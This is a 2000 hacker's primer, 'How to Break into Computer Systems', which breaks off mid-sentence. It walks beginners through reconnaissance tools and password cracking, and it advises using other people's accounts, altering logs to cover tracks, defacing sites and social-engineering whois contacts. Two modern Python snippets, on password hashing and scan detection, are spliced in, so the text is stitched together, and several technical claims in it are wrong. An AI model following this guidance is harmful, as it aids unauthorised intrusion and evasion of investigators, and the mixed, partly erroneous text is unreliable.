
The Beginning

-= How to Break into Computer Systems =- Release 3.0 Portwolf, 2000


portwolf@portwolf.com
Information Insemination
__________________________________________________
Foreword
New in Release 3
Intro
Prerequisites
Intro to h/p/v/c
A little Hacker lingo
Ethics
What you need - a Hacker's equipment
Keeping from getting caught
TCP/IP and the Client/Server model
Getting Started - You're first night as a Newbie
UNIX
Windows NT
Netware
Miscellaneous OSs
"Unbelievable... a Hacker!"
Elite Hacker Tactics
System Exploits
Firewall Penetration
In Summary
Appendix A - Dialup Hacking
Appendix B - commonly used UNIX passwords / usernames
Appendix C - basic UNIX commands
Appendix D - NT Hex Codes
Appendix E - well known TCP ports
Appendix F - NT and UNIX groups
Appendix G - Further Reading
__________________________________________________

Foreword

Imagine two rooms. Between these two rooms is a solid brick wall. We as human beings
have been conditioned to believe that this wall keeps us from moving from one room to
the other. From the moment each of us was born, we have been taught that we cannot
move between these rooms. We have been made to think according to predefined rules.
We think in a box. Boxthinkers. Hacking - by any definition - is the art of thinking
outside of that box. To creatively formulate new, unconventional ways to do things.
Dennis Ritchie (the creator of C), Linus Torvalds, the people at Xerox who invented the
mouse. All became who they were for thinking outside the box. Kevin Mitnick and Kevin
Poulsen accomplished the legendary computer and phone system break-ins they did by
not being boxthinkers. Computer hacking does require an amount of technical knowledge.
That's why you're reading this manual. Arguably more important, though, is creativity,
resourcefulness, and an open mind. When shown a brick wall, know that it is possible to
get into the other room - all you have to do is figure out how.
You have to let it all go, Neo.
Fear. Doubt.
Free your mind.
-Morpheus, The Matrix
New in Release 3
Well, it's 2000 now. Many years ago hackers were very few, and pretty much unheard of.
Now it's the second millennium, with technology to show for it. And 'hackers in training'
are getting their hands on computers and learning the craft in unbelievable quantities. This
is partly due to the extreme drop in cost in computer hardware we've seen in the last few
years. It also is due to the demystification of the craft of hacking, and others willing to
share their information and secrets. Which is - of course - what this really is all about.
Information. And getting it one way or another.
So here is my contribution to the technological underground. Are you a newbie at
hacking? Are you completely new to this game, and find nothing but outdated and vague
info on the subject? Look no further - this is the exact manual you've been looking for.
Here you'll find the bare basics of hacking, including what kinds of programs you'll need
and how to use them. You'll learn the basics of UNIX and NT. You'll learn how to crack
any password. You'll learn how to defeat firewalls. If you already know the basics, you'll
learn a variety of sophisticated techniques and tactics to add to your weaponry. And if you
consider yourself a novice hacker already - great. You'll be able to dive right into the
advanced NT and UNIX break-in techniques later in this text. If not - don't worry - you'll
be able to do all this el33t stuph soon enough.
What will you find new in this release? I have a whole new section of exploits for various
platforms, including CGI vulnerabilities, where to get code for them, etc. This should be a
great resource to newbie and ueberhacker alike, it has a variety of vulnerabilities to keep
an eye out for while hacking. Also, most of the existing sections have been updated and
expanded upon, especially the NT and UNIX sections. Also, I took out the RFC on well-known ports, and just made one of my own - it seemed like a waste of space since you'll
almost never see half of the ports listed there. The Elite Hacker Tactics section has been
filled with more 31337 k-rad stuph too. Also, this release is a bit more... resource full. By
that I mean that this isn't a light-reading text that you'll read once and throw away. Most
sections are pretty technical and full of content, so you'll probably have to read it a few
times to get everything. Also, DV3 serves as resource material - tables and charts of
important stuff that you'll want to refer to later. And if you're brand new to the world of
h/p, some of the latter sections might confuse you - and will make sense after you've
gained a bit of experience. This cannot be stressed enough: after you read a section try
out what you've learned. Things will make more sense, and come together better.
One note though. Be sure to read the Keeping from Getting Caught section before you
actually try anything. Newbies who pull off their first hack tend to get overexcited and do
stupid things. Be paranoid.
So sit back, crack open a can of Jolt Cola, and dig in.
Intro
The reason I wrote this is that there are a vast number of "hacking for newbies" texts
available on the Internet, most by very knowledgeable individuals. However, the vast
majority are older, and cover dialup hacking only. To explain what I mean by that, let me
categorize the various means in which a hacker gains access to a computer, supermini,
mainframe, etc - into three distinct genres. There's the obvious on-site access, which is as
simple as being in the premises of the system in question. Theres dial-up access, which is
simply using a modem to dial into another modem, and going from there. And finally,
there's access via the Internet. On-site (relatively unfeasible in most cases) hacking is
usually covered briefly in most of the readily available texts out there, though they mostly
focus on dial-up hacking. The idea of connecting to a computer elsewhere with a modem
has been around a long time, so therefore has the dial-up access method of hacking. But
the Internet, having only been around for about 30 years, has not been a widely used
method of access. Until recently. Actually, it hasn't been that recent, so why a guide to
hacking on the internet hasn't already been written is beyond me. A few exceptions are
The Happy Hacker's Guides to Mostly Harmless Hacking series. These
tutorials (available at www.happyhacker.org) certainly serve their purpose but are also a
bit limited. The primary focus of this text is hacking over the Internet. There's something
avatar-like, almost omniscient about the ability to be able to do so much without leaving
your house. Now, take any computer or network of any potential target of yours, and
most likely they are connected to the Internet. Which means you, as an Internet-hacker-to-be, can break into it. This is very good for people like us, because finding a computer or
network on the Internet is much easier than finding a modem number (I'll explain how
later). Now, you may on occasion find yourself actually dialing right in to a computer you
attempt to break into, but most systems you target won't have a dial-in modem - this trend
has faded with the explosion of the Net. One exception to this rule is NT's RAS (Remote
Access Service), which I'll go into in the NT section, and in Appendix A.
One last thing before we get into the actual hacking stuff: this text will not teach you to be
a hacker, nor will any text out there or any collection of texts. Hacking is a self-taught
craft, meaning you will need the dedication to go out and find materials on your own. If
you have a specific question, go ahead and ask someone on a hacker IRC channel or
whatever, but if your question is too broad ('how do I hack into a Netware box?') you will
be ridiculed and labeled a lamer. Keep your questions technical in nature ('what's the
SMTP command to set the recipient'), and most will be happy to share their knowledge
with you. Once you've completed this text, I suggest you play around with what you've
learned (as 80% or so of what you learn will come from hands-on experience). Next you
will need some material on topics just glazed over in this text. Get yourself a UNIX book,
specifically: one on UNIX networking. Then get yourself a book on Windows
Networking. These are also readily available. Definitely get yourself a TCP/IP book as
you delve deeper into the hacking world. At one point, also, you'll almost have to learn at
least one programming language (to become elite), so pick one, and get a book on it.
Good ones to learn are: C and Perl. VB is good for all you Win32 gurus. Other books
you should have in your collection are general hacking books. The book Maximum
Security is very informative, as is Secrets The Happy Hacker. Hacking Exposed is a new
one that I haven't seen yet, but heard good things about it. Secrets of a Super Hacker,
Steal This Computer Book, and the New Hacker's Dictionary are at least worth checking
out at your library. If all this seems like too much work, well then you probably lack the
dedication to become a hacker. If you're still eager to learn - great! This text will point
you in the right direction. So, without further ado - on with the hacking!
Prerequisites
First of all, let me say that it is assumed that the reader of this text already has a basic
working knowledge of computers and the Internet. Not extensive, by any means. This
text is targeted to people who probably have their own computer (or ready access to one),
surf the web, and have always wanted to know what exactly hacking was all about. If you
start reading and find yourself lost, put this down and go get yourself a basic book on
computers and the Internet before you delve into this. For example, it's assumed that you
already know what a URL (web address) looks like (eg:
http://www.hackers.com/archives). Also, you should know what a 'prompt' looks like (eg:
C:\, %, or #).
This really goes without saying, but I, as the writer of this text, take no responsibility for the
actions of those who act based upon principles learned by reading this material. Really,
this is intended to inform anyone who's always wondered how exactly these "hackers" they
hear so much about do what they do, and for concerned system administrators who want
to know how hackers can infiltrate their network. Breaking into systems then deleting all
sorts of stuff doesn't prove your leetness, it proves your immaturity. This manual can
make you a bad-guy in a day, so don't be. Okay, anyways, onto the good stuff.
Intro to h/p/v/c
This is an acronym you're sure to see a lot, or sometimes just h/p. This refers to activities
of the digital underground. It stands for hacking/phreaking/virii/crypto.
Hacking
The subject of this manual. Arguably synonymous to the term 'cracking.' Though some
might tell you that hacking means to creatively (and legally) explore different subjects of
computers, like programming and networking; while cracking refers to breaking into
various systems. I'll let you form your own definitions of each.
Phreaking
Phreaking, in a nutshell, is hacking the public telephone network (the PSTN). Phreaking
isn't done with computers (most often) though. Now, there aren't really things to break
into on the telephone network - so hacking might not be the exact term. Phreaking is
more of exploring the phone network, learning how it works and how (in some cases) to
circumvent traditional 'blocks.' Phreaks use what are called boxes. Ever heard of a
redbox or a bluebox? These are the two most well-known phreaker tools. Redboxes are
autodialers (available at Radio Shack) with a crystal of a different MHz used to generate
the tones made when you drop coins into a payphone. Meaning - free calls. Nowadays
these don't work on the newer payphones - but if you live in a smaller town with older
systems, it's worth a try. Blueboxes are used to gain the privileges of the average operator.
Beige boxes (also called linesman handsets) are used to connect to phone box terminals
that are located in various places. Other boxes include: the orange box, the yellow box,
the black box, and pretty much any other color you can think of. For more info, get
yourself a text on phreaking.
Virii
The plural of virus - meaning computer virus. Viruses really have nothing to do with
hacking (contrary to the movie 'Hackers') - but are a component of the underground.
Originally, viruses were written in assembly, which is like a very low-level programming
language (the language used to write the programming languages). Assembly code is just
a step above binary (ones and zeros), and isn't coherent at all. At any rate, creating viruses
then was honorable only because of the complexity involved. Now, though, viruses are
written in C, perl, C++, java, scripting languages (like javascript), and even ActiveX.
Much less skill is required - making virus writing not much of an accomplishment. In fact,
programs like Virus Lab exist that aid completely computer-stupid people in making their
own viruses.
Types of viruses include: the boot sector virus. These infect (copy their code into) the
boot sector of your hard drive (the MBR, specifically), so that every time you boot up, the
virus is loaded into memory. A virus in memory is said to be 'active' - and once active,
viruses can do whatever they were created to do. File viruses are another kind. They
infect executables (applications) or individual files. Whenever the infected program is run, or the infected file loaded into
memory (eg: opening an infected MS Word file) the virus becomes active. Some less
educated people may also tell you that a Trojan Horse is another kind of virus - in fact
most virus checker software look for them also. Trojans are in fact, tools that we
(hackers) use. They are back door programs, remote administration tools, fake login
screens, even keyloggers are considered Trojans by some. Don't be confused though - Trojans are not virii. I'll go into more depth on Trojans later.
Crypto
Cryptography. Encryption is a security measure used in many ways. Put simply, encrypting something (a file, a word, whatever) changes it into something
incomprehensible. For example, if I encrypted the word: 'windows', it might look
something like: '2mkd032nwds'. The text or file before encryption ('clear text') is
converted into the jargon ('cipher text') by means of an encryption algorithm. This is a
complex mathematical and logical equation used to cipher data. Two common uses of
encryption are password hashing and VPNs.
Whenever you log into any kind of computer system, the OS compares the password you
entered to the password it has on file to determine if you entered the password correctly.
However, keeping passwords on file is inherently insecure. The solution - encryption.
The system (be it UNIX, NT, or whatever) keeps the passwords encrypted (called the
'hash'), and decrypts it temporarily just long enough to see if it matches what you entered.
(This is all done in RAM; the password hashes in the actual password file on the hard disk
stay encrypted).
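One caveat a practitioner will want on the paragraph above: a password hash is one-way, so the system never decrypts the stored value; it re-hashes what you typed and compares the two digests. The following is an added example of that check, my own code rather than anything from this text or any real OS, with the record format and PBKDF2 parameters chosen by me.

```python
import hashlib
import hmac
import os

# Added example (not from the original text). Shows how a system verifies a
# login against a stored one-way hash: it never decrypts the stored value,
# it re-derives the hash from the candidate password and compares.
# The record format and PBKDF2 parameters below are my own choices.

ITERATIONS = 100_000  # work factor; higher slows offline cracking of stolen hashes
SALT_BYTES = 16       # per-user random salt so equal passwords hash differently


def hash_password(password, salt=None):
    """Return a storable record 'pbkdf2_sha256$<iters>$<salt hex>$<hash hex>'.

    A fresh random salt is drawn unless one is supplied (supplying one is
    only useful for deterministic tests).
    """
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (ITERATIONS, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Check a candidate password against a stored record.

    The stored hash is treated as opaque: we recompute PBKDF2 over the
    candidate with the record's salt and iteration count, then compare the
    two digests in constant time so timing does not leak how many bytes matched.
    Malformed records are rejected rather than raising.
    """
    fields = stored.split("$")
    if len(fields) != 4 or fields[0] != "pbkdf2_sha256":
        return False
    _, iters, salt_hex, hash_hex = fields
    try:
        salt = bytes.fromhex(salt_hex)
        expected = bytes.fromhex(hash_hex)
        iters = int(iters)
    except ValueError:
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iters)
    return hmac.compare_digest(candidate, expected)


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))  # True
    print(verify_password("wrong password", record))                # False
```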

Virtual Private Networks (VPNs) are two computers talking to each other over a publicly
accessible network (usually the Net) that encrypt all data before sending it to one another.
The machine on the other end of this link then decrypts it, and vice versa. This way, if the
data is intercepted (by say, a sniffer - a tool you'll learn to use) it's incomprehensible to the
interceptor. This is the same way SSL (Secure Socket Layer - encrypted HTTP or https)
and SSH (Secure SHell - encrypted telnet sessions) work.
You can use encryption to your advantage. Get PGP (Pretty Good Privacy) or some other
military-strength encryption scheme and encrypt your secret files (ie: your hacker stuph!).
Federal authorities cannot force you - even in court - to give out the key to your
encryption.
A little Hacker lingo
I'll get the jargon out of the way now, in case I refer to one of these terms later.
OS - Operating System. The OS handles CPU and memory usage of the system, manages
applications, and provides the interface. Common OS's are: Windows, UNIX, MacOS,
VMS, DOS, Netware, OS/2, and Be.
Hacker - one who infiltrates and explores various computer systems for the sole purpose
of expanding their knowledge and satisfying their insatiable thirst for information.
Cracker - a hacker who acts maliciously. Deletes, crashes, implements viruses, etc.
Warez d00d - a lowlife techno weenie who sells pirated software (basically people who
couldn't quite make it as a hacker).
Elite, leet, el33t, 31337, etc - a hacker who's learned just about everything there is to
know regarding computers, networks, and security (not really possible). Many claim to be
leet, very few are.
Newbie - an amateur hacker (different from a lamer).
Lamer - a complete hacker wannabe. The difference between a newbie and a lamer is this:
a lamer knows a little bit, decides that's enough, and calls himself a hacker. A newbie also
knows a little bit, but is humble enough to know that there is a lot more to be learned.
Root - status on any system that gives the hacker total control of it. Usually, root is the
desired end result of any hack.
Shell - a shell is an interface between you as a user and a particular computer. Windows
Explorer is a shell, DOS prompts are a shell. If you log into a UNIX machine, you are
using a shell.
Rootshell - A rootshell is a shell with root (superuser) privileges to resources on that
machine. You can obtain a rootshell by either logging into the box as root (assuming you
have the password) or by using an exploit program to create a rootshell for you (more on
this later).
Packet - when data is sent over a network, it is broken down into manageable chunks
called packets. This isn't always the case, but in TCP/IP (the protocol used on the
Internet), this is always true.
Protocol - a set of rules and guidelines that computers on a network must follow in order
for communications to be coordinated, and therefore successful. A protocol defines
specifically how data is broken into packets, sent over a wire, and reassembled at the other
computer (and how sessions are set up over a network).
Client - Usually refers to either A: a computer on a network that requests resources from a
server, or a computer that is not a server; or B: a program that makes requests of a server
or service. Netscape Navigator and Internet Explorer are client software programs in that
they request web pages from servers.

Server - Either A: a computer set up to share resources such as printers, files, or serve
web sites, or B: a program used to fulfill requests, such as IIS (Microsoft's Internet
Information Server). More on clients and servers later.
Proxy Server - Okay, if a company has its own network and its own website, there will be
a portion of the network accessible (with a username and password, of course) by anyone
with Internet access. All the HTML files for the company's website will be somewhere on
this segment of the network. Then, there will be the portion of the network strictly for
business purposes, hidden from the rest of the world. A proxy server (along with
sometimes a firewall) separates these two segments. So if you want to access the
restricted part of any network, you will need to do it via the proxy server. Also, if all the
workstations in an office have Internet access, they most likely do through the proxy
server.
Firewall - Sort of like a proxy server, but has no other purpose but to keep unauthorized
user out. Even if you have a valid username and password for a system - if a firewall is in
your way, you're pretty much out of luck. Hacking through one is very difficult - even for
the leet. It is possible, though, and I've provided a few techniques and angles to cracking
them in the Firewall Penetration section.
Daemon - A daemon is a program that is active but does nothing until a certain condition
becomes true (similar to a TSR, or program in your Win9X system tray). Daemons often
'listen' on certain TCP ports of a machine on the Net, and when a connection is made, they
will do what intended. For example, when you browse www.hotmail.com, your browser
connects to TCP port 80, and the daemon listening on that port (httpd, usually) sends you
a copy of the web page you requested. More on this later.
Ethics
I won't bore you with the usual "never use your powers for evil" stuph, but I have to
throw out my opinion on ethics. Hacking maliciously, be it by deleting files, screwing with
configurations, or what have you, besides being just plain mean, is a sure way to motivate
people into tracing you. As a rule, you should never change any files on a system you
break into. The lone exception to this is altering log files to cover your tracks (explained
later). Hacking webpages - changing the default web page to 'Pheer me! This box was
haxored by M4nt|S' - is a bit of a gray area. Technically, it's considered malicious, and will
piss the sysadmin of the network off. But if you must - at least back up the original
index.html or default.htm file.
What you need - a Hacker's equipment
Here is a basic list of the hardware, software, and other miscellaneous things you will need
to begin your days in the world of digital espionage.
A computer (duh) with some kind of Internet access, be it PPP, a T1, or whatever (more on this later).
One, preferably two accounts with an ISP, your phone company, or whatever. One should be in no way shape or form attached to you (ie: someone else's account!) More on this later.
The following software:
An Internet browser.
A telnet client.
An FTP client.
A ping utility.
An IP scanner.
A port scanner.
A whois and nslookup utility.
A traceroute utility.
A password cracker.
Less necessary but very useful utilities include:
A CGI vulnerability scanner
A Net BIOS share scanner.
A finger client.
Compilers.
Cache rippers.
A brute force program of some sort.
Trojans, rootkits, and RAT's.
Internet warfare tools.
Sniffers.
Keyloggers.
Sound complicated already? It's really not - I'll explain the function of each, along with
some good ones of each. Almost all the programs I talk about here are available at The
CyberUnderground (http://home.cyberarmy.com/tcu). Otherwise, try
www.hackersclub.com, www.hackers.com, www.anticode.com, or just do a search online.
Internet Browsers
If you don't know what this is or where to get one, you should probably put this manual
away. IE and Netscape are the two biggies. Lynx is phun to surf with on occasion
(UNIX). Whatever browser you use, make sure it allows for the use of proxies. IE and
Netscape do (even the older versions), so now would be a good time to familiarize
yourself with the proxies options for each (more on this later). Also, make sure your
browser supports gopher (which is kinda like HTML but only text) in case you stumble
upon an old gopher server - these can be goldmines of information! IE and Netscape
support gopher - to use it just type gopher:// instead of http://.
Telnet Clients
Almost any OS you get these days has some sort of telnet client. Just type 'telnet' at a
command prompt (Windows or UNIX). This is the primary means in which you'll connect
to computers, and though it's a simple enough program, to hack you'll have to become
very familiar with how it works. Though fine for newbies, you'll probably find the
Windows telnet client a bit... lackluster later in your hacking career. PuTTY is a good
replacement (which, by the way, supports SSL and raw TCP connections - very handy).
Whatever you use, make sure you can log (record) your sessions to a text file. The
Windows client does allow for this, so try it out.
FTP Clients
FTP is the Internet protocol used to transfer files between two computers, though I'll go
into more depth on this later. Both UNIX and Windows 9X come with command-line FTP
clients. IE and Netscape have built-in FTP clients, and even have a GUI. The downside of
them is that you can't issue commands. To use it, just type ftp:// instead of http://. You
can also buy full-blown GUI FTP clients like WS FTP (www.ipswitch.com), and FTP
Explorer (www.microsoft.com). My personal opinion, though, is that command-line is
faster and gives you more control.
Ping Utilities
Both UNIX and Windows 9X have command-line ping utilities. Ping is a simple program
(part of the ICMP protocol - which you'll learn later) with one purpose: to test the
connectivity between two machines. To ping a computer type:
%ping www.computername.com
(the '%' is a UNIX prompt - similar to C:\)
If there is an unblocked path between you and www.computername.com, the ping will be
returned by a pong, a reply. Ping is used to test connections, and to determine the time it
takes for the ping packet to make a round trip. For example, a successful (unblocked)
ping might look like:
c:\ping www.msn.com
pinging www.msn.com [221.54.64.7] with 32 bytes of data:
Reply from 221.54.64.7: bytes=32 time=100 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=90 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=95 ms TTL=32
Reply from 221.54.64.7: bytes=32 time=100 ms TTL=32
Whereas an unsuccessful ping might look like:
c:\ping 201.33.250.1
pinging 201.33.250.1 with 32 bytes of data:
unable to establish connection
You can play around with switches to send pings of different payloads (sizes), number of
packets, and TTL. With both UNIX and Windows pings, you can get an IP address from a
host name, and vice versa. More on IP addresses later.
IP Scanners
Sometimes called a subnet scanner. Ever heard of a wardialer? A wardialer is a program
used by old-school hackers. All it did was dial phone numbers in a specified range looking
for modems. An IP scanner does the same thing - enter a range of IP addresses or a
subnet, and it will ping each address in that range or subnet to determine if that address
belongs to a computer (and if it is reachable, ie: not blocked by a firewall, proxy server, or
router). Most IP scanners prompt you for a start address and an end address - and it will
attempt to ping every address in between. Subnet scanners, though, ask for the first three
octets, and it will scan from .1 to .254 (the entire block). If you don't know how IP
addressing works, you will after reading the TCP/IP section. Here's an example IP scanner
output screen:
Scan from: 130.11.8.1
Scan to: 130.11.8.10
------------------------------
Scanning from 130.11.8.1 to 130.11.8.10
130.11.8.1: Connected
130.11.8.2: Connection Refused
130.11.8.3: Connection Refused
130.11.8.4: Connection Refused
130.11.8.5: Connection Refused
130.11.8.6: Connected
130.11.8.7: Connected
130.11.8.8: Connection Refused
130.11.8.9: Connected
130.11.8.9: Connection Refused
130.11.8.9: Connected
A 'connected' means that the machine can be pinged, or connected to. A 'connection
refused' means that either no computer belongs to that IP address, or that the machine isn't
accessible to you: behind a firewall or proxy server. Some IP scanners show each machine
in the scan, while others only show the ones that were successfully connected to.
Good IP scanners are: HakTek, WS PingProPack, and Shadow Scan. Online scanners are
available at places such as http://infinityzone.cjb.net.
Port Scanners
A port scanner scans a particular IP address or hostname (a particular computer) for open
ports. No, I don't mean serial or parallel ports. TCP ports - services, programs running
on that server that can be connected to. The concept of ports will be explained in detail in
the TCP/IP section of this manual. For now, just know that port and IP scanners are two
very important tools you'll need. Output from a port scanner might look something like:
Scan: 20.1.139.21
Scan from: 1
Scan to: 1024
------------------
Scanning from TCP port 1 to port 1024
Open: 16 (chargen)
Open: 21 (ftp)
Open: 23 (telnet)
Open: 25 (smpt)
Open: 80 (www)
Open: 79 (finger)
This means that ports 16, 21, 23, 25, 79, and 80 are open on this particular machine
(20.1.139.21). Port numbers are generally used for a specific service, for example an open
port 79 almost always is used for fingerd (the finger daemon, or service).
Good port scanners are: NMap (UNIX), HakTek, WS PingProPack (which will scan IP
ranges and ports on each one), and YAPS. Online scanners are available also. These are
nice because the server running the scan scripts does the scanning, meaning its IP
address gets logged on the target machine - not your own. This is a good way to keep
from being traced.
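As a defender-side counterpart to the IP scanner and port scanner output above, here is an added example (my own code, not from this text) that parses constructed firewall-style log lines and flags the two patterns those tools produce: one source probing many hosts, and one source probing many ports on one host. The log format, the thresholds, and the addresses 198.51.100.7 and 203.0.113.5 are assumptions; the scanned ranges reuse the ones shown in the text.

```python
import re
from collections import defaultdict, namedtuple

# Added example (not from the original text): detecting the two scanner
# behaviours described above from the defender's side. The log format,
# the source address 198.51.100.7 and the benign client 203.0.113.5 are
# constructed; the target ranges mirror the IP and port scanner output shown
# in the text.

Event = namedtuple("Event", "ts proto src dst port action")

# Constructed sample firewall log: "<time> <proto> <src> -> <dst>[:<port>] <ALLOW|DENY>"
SAMPLE_LOG = """\
10:00:01 ICMP 198.51.100.7 -> 130.11.8.1 ALLOW
10:00:01 ICMP 198.51.100.7 -> 130.11.8.2 DENY
10:00:01 ICMP 198.51.100.7 -> 130.11.8.3 DENY
10:00:02 ICMP 198.51.100.7 -> 130.11.8.4 DENY
10:00:02 ICMP 198.51.100.7 -> 130.11.8.5 DENY
10:00:02 ICMP 198.51.100.7 -> 130.11.8.6 ALLOW
10:00:03 ICMP 198.51.100.7 -> 130.11.8.7 ALLOW
10:00:03 ICMP 198.51.100.7 -> 130.11.8.8 DENY
10:00:03 ICMP 198.51.100.7 -> 130.11.8.9 ALLOW
10:00:04 ICMP 198.51.100.7 -> 130.11.8.10 DENY
10:05:10 TCP 198.51.100.7 -> 20.1.139.21:16 ALLOW
10:05:10 TCP 198.51.100.7 -> 20.1.139.21:21 ALLOW
10:05:10 TCP 198.51.100.7 -> 20.1.139.21:23 ALLOW
10:05:11 TCP 198.51.100.7 -> 20.1.139.21:25 ALLOW
10:05:11 TCP 198.51.100.7 -> 20.1.139.21:79 ALLOW
10:05:11 TCP 198.51.100.7 -> 20.1.139.21:80 ALLOW
10:05:12 TCP 203.0.113.5 -> 20.1.139.21:80 ALLOW
10:05:14 TCP 203.0.113.5 -> 20.1.139.21:80 ALLOW
10:05:20 TCP 203.0.113.5 -> 20.1.139.21:25 ALLOW
10:05:31 TCP 203.0.113.5 -> 20.1.139.21:80 ALLOW
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proto>ICMP|TCP|UDP) (?P<src>\S+) -> "
    r"(?P<dst>[0-9.]+)(?::(?P<port>\d+))? (?P<action>ALLOW|DENY)$"
)


def parse_log(text):
    """Parse log lines into Events; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        port = int(m.group("port")) if m.group("port") else None
        events.append(Event(m.group("ts"), m.group("proto"), m.group("src"),
                            m.group("dst"), port, m.group("action")))
    return events


def detect_scans(events, host_threshold=5, port_threshold=5):
    """Flag sources that behave like the IP scanner or port scanner described above.

    host_sweep: one source touches >= host_threshold distinct destination hosts.
    port_scan:  one source touches >= port_threshold distinct ports on one host.
    DENY lines count too: a scanner's refused probes are exactly the signal.
    For simplicity all events are treated as one time window; a real detector
    buckets by time so that a slow scan and a busy legitimate client differ.
    """
    hosts_by_src = defaultdict(set)
    ports_by_pair = defaultdict(set)
    for ev in events:
        hosts_by_src[ev.src].add(ev.dst)
        if ev.port is not None:
            ports_by_pair[(ev.src, ev.dst)].add(ev.port)
    findings = []
    for src, hosts in hosts_by_src.items():
        if len(hosts) >= host_threshold:
            findings.append(("host_sweep", src, len(hosts)))
    for (src, dst), ports in ports_by_pair.items():
        if len(ports) >= port_threshold:
            findings.append(("port_scan", src, dst, len(ports)))
    return sorted(findings, key=lambda f: (f[0], f[1]))


if __name__ == "__main__":
    for finding in detect_scans(parse_log(SAMPLE_LOG)):
        print(finding)
```

The benign client 203.0.113.5 repeatedly hitting port 80 is not flagged, which is the distinction a sysadmin reading these logs cares about: distinct hosts and distinct ports, not volume.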
Whois and NSLookup

Whois is a utility used to find out who a particular domain name (eg: hackersclub.com)
belongs to. If you whois a site, you'll get the address, phone number, and email address of
the technical contact (probably the system administrator) and the administrative contact
(probably the owner or person who runs that name / business) of it. NSlookup, on the
other hand, is a utility to find out what domain a particular hostname or IP address belongs
to, and what name servers represent it. This is useful when trying to map out networks,
and determine all machines belonging to a certain domain. The concept of mapping
networks, name servers, and the like will be explained in more detail in later sections.
Here is a sample whois query:
%whois aol.com
connecting to rs database...connected
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnel, David B pmdatropos@aol.com
(730) 453-4255
Technical Contact:
America Online trouble@aol.net
(730) 453-4160
Record last updated on 13-mar-97
Record created on 22-jun-95
Domain Servers listed in order:
dns-01.aol.com 152.163.12.1
dns-aol.fu.net 122.56.87.3
By whois-ing aol.com, we get a wealth of (public) info. We get phone numbers to social
engineer if need be (explained later). We get email addresses (valid login names). We get
the hostnames and IP addresses of the DNS servers (also explained later). All things to be
noted when trying to hack a particular domain.
Here's an example nslookup query:
%nslookup oliver.mail.tlsp.com
[no name] (oliver)
Hostname: oliver.mail.tlsp.com
Address: 103.222.54.8
System: SUN running SUNOS
nameserver: ns1.mail.tlsp.com
nameserver: ns.tlsp.com
nameserver: ns2.tlsp.com
nameserver: name.att.net

So, let's say that we wanted some info on the computer oliver.mail.tlsp.com. We run an
nslookup on it, as shown above, and look at all the stuff we get. The IP address, what
kind of machine it is (a Sun box), the OS (SunOS - a flavor of UNIX). We get all the
domain name servers for that domain - including tlsp.com's upstream provider - their ISP.
All very useful information. If you're new to hacking and aren't sure how all this info will
help you break in, you will as you get further into this manual.
UNIX has whois and nslookup built right in - just type either at a prompt. Windows,
however, doesn't - you'll have to go and get nslookup and whois utilities for your
Windows box. Good ones are Sam Spade and WS_PingProPack - both available at TCU.
What's the difference between whois and nslookup? You whois a domain name
(something.com), whereas you nslookup a particular machine (IP address or host name).
Now would be a good time to download one of each (both programs listed above have
both utilities) and play with them a bit.
Traceroute
The Internet is an internetwork (hence the name), meaning a network of networks. These
individual networks are connected together by sophisticated pieces of hardware called
routers. Oftentimes, there are multiple routes between your computer and any other on
the Net. Traceroute utilities do just that - trace the route between you and any computer
you specify, listing the IP address of any router it passes through to get there. Traceroute
is used to troubleshoot network problems, mostly. As a hacker you can do a number of
things with traceroute. If you're being blocked from a particular IP address on the Net,
you can run a traceroute to it and find out exactly where you're being blocked at. Also,
you can find your target's upstream provider with traceroute - handy in mapping networks
and learning more about your potential victim. Both UNIX and Windows have traceroute
utilities built in: for UNIX, type 'traceroute', for Windows type 'tracert' at a command
prompt. Output from a traceroute might look like:
C:\tracert www.yahoo.com
tracing route to www.yahoo.com [250.217.111.6]
over a maximum of 30 hops:
1 150ms 144 ms 138 ms dialup-b.yourisp.net (110.135.87.4)
2 99 ms 145 ms 150 ms cisco7k.mr.com (32.55.87.1)
3 100 ms 144 ms 161 ms routel2.uswest.com (98.2.3.78)
4 160 ms 160 ms 143 ms gateway.con324.att.net (178.68.111.3)
5 147 ms 162 ms 177 ms intern.net3.yahoo.com (250.23.87.2)
6 171 ms 168 ms 165 ms www.yahoo.com (250.11.45.87)
trace complete
Here we had to go through 4 routers to get to www.yahoo.com. The first entry (dialup-b.yourisp.net)
is your computer - the last is your destination. Now, pretend for a minute
that www.yahoo.com was blocked by a firewall. Then your traceroute might look like:
C:\tracert www.yahoo.com
tracing route to www.yahoo.com [250.217.111.6]
over a maximum of 30 hops:
1 150ms 144 ms 138 ms dialup-b.yourisp.net (110.135.87.4)
2 99 ms 145 ms 150 ms cisco7k.mr.com (32.55.87.1)
3 100 ms 144 ms 161 ms routel2.uswest.com (98.2.3.78)
4 160 ms 160 ms 143 ms gateway.con324.att.net (178.68.111.3)
intern.net3.yahoo.com reports: host unreachable
Here intern.net3.yahoo.com is telling us that it won't let any of our packets get past it. Most
likely a firewall of some sort. If ever you can't connect to an IP address or hostname that
you know to be valid, traceroute to it and find out what's blocking you. Now, if you look
at all this hostname and IP address stuph and scratch your head - don't worry. You'll
understand better after reading the 'TCP/IP and the Client/Server Model' section.
Password Crackers
As described in the Crypto section of 'Intro to h/p/v/c', the passwords of any computer
system are encrypted. Oftentimes your ultimate goal in hacking into a machine will be to
get the file that holds these passwords. This step, though difficult, is usually one of your
last. So if you can get your hands on /etc/passwd of a UNIX box, or the sam._ file or a
registry dump from an NT box, you'll want a password cracker program to decrypt the
hashes. How do these work? Well, most OS's (including NT, Netware, and UNIX) use
the DES (Digital Encryption Standard) encryption form. So knowing that, it's possible to
decrypt the password hashes, with the aid of a dictionary. Yes, a dictionary - in this case a
file of thousands of words. What the cracker program will do is take each word from the
dictionary file, encrypt it using DES, and see if the encrypted dictionary word matches the
encrypted password. If so - that word is (95% of the time) the password. Needless to
